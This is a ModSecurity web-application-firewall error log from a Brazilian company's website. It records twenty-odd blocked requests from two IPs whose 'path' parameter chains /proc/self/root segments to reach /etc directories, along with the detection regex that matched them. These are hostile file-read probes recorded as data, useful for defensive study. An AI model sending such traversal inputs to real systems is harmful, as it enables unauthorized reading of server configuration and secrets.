[Mon Mar 16 14:15:15.346846 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.243.203:42398] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6o6QpVkWug9HeOt89hgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:16.767352 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:56658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6pKQpVkWug9HeOt89igAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:17.817944 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:42410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6paQpVkWug9HeOt89jAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:18.059168 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:56674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6pqQpVkWug9HeOt89jQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:20.188438 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.243.203:42418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6qKQpVkWug9HeOt89kgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:20.344660 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:46210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6qNSswJuvopo3lOhnXAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:21.695469 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:46218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6qf9ocpUE4ed4uDz4QAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:24.002880 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:46230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6rFajLEzk2WiQ-10afAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:25.325096 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:48056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6rbABkC4fWIHEf8H3CAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:25.330108 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:46236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6rVajLEzk2WiQ-10afQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:26.662384 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:48060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6rrABkC4fWIHEf8H3CQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:27.731202 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:46252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6r_9ocpUE4ed4uDz4QwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:28.018713 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:48066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6sLABkC4fWIHEf8H3DQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:29.431365 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:48082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6saQpVkWug9HeOt89lQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:30.757019 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:34060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6sqQpVkWug9HeOt89lgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:31.502411 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:45710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6s3jZBu2q05ozVU9hZAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:32.860771 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:45720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6tI6lpbStxTqkSkt0zQAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:34.169631 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:34074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ttSswJuvopo3lOhnXwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:38.156224 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:45732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6upqj1wV0Si-Okef3CgAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:41.440783 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:34076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6vf9ocpUE4ed4uDz4SwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:41.692694 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:60432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6vaTCbgAP5jq5TegzHAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
